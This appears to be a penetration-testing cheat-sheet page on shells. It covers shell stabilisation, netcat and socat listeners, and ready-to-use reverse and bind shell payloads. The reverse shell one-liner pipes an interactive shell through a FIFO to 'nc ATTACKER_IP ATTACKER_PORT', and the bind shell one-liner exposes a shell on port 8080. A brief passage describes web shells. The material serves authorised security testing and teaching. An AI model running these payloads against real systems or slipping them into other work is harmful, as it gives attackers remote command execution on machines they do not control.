Shell

A shell is a command-line interface that allows users to interact with an operating system by executing commands. It provides a text-based environment where users can manage files, execute programs, and automate tasks through scripting. Some common shell environments include Bash, Zsh, and PowerShell.

Shell Stabilization

When working with an unstable or limited shell in a penetration testing scenario, stabilization techniques improve usability by enabling features like tab autocomplete and signal handling.

  1. Spawn a Bash Shell

To upgrade a limited shell to a fully interactive Bash shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

  1. Set Terminal

Some shells may not recognize the terminal type. Setting it to xterm ensures better compatibility:

export TERM=xterm

  1. Suspend Process and Bring to Foreground

If a shell does not properly handle terminal controls, use Ctrl+Z to suspend the process, then run:

stty raw -echo; fg

This step improves the shell experience by enabling features like tab autocomplete, arrow keys, and Ctrl+C to kill processes.

Listeners

Listeners are used to capture incoming shell connections.

Netcat (nc)

  1. Basic Listener

    nc -nlvp <PORT>

  2. Enhanced Shell with Rlwrap

    rlwrap nc -lvnp 443

    • rlwrap provides additional shell features for better usability.

Socat

Functionality

Command

Description

Simple Listener

socat -d -d TCP-LISTEN:443 STDOUT

Listens for incoming TCP connections.

Connect to Remote Port

socat TCP:<IP>:<PORT> -

Connects to a remote host and port.

Secure Connection (SSL)

socat stdio SSL:<IP>:<PORT>,cert=<CERT>,key=<KEY>,verify=0

Establishes an encrypted connection.

Reverse Shell

Allows remote command execution by connecting the target back to the attacker.

Listener

nc -lvnp 443

Payload

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f

Bind Shell

A bind shell pens a specific port on the target for the attacker to connect. Less common than reverse shells due to higher detectability.

Listener

nc -nv TARGET_IP 8080

Payload

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f

Web Shell

A web shell is a malicious script uploaded to a vulnerable web application to gain unauthorized access to the server. Attackers use web shells to execute arbitrary commands, manipulate files, or pivot deeper into a network.

PreviousLinuxNextUsefull tricks

Last updated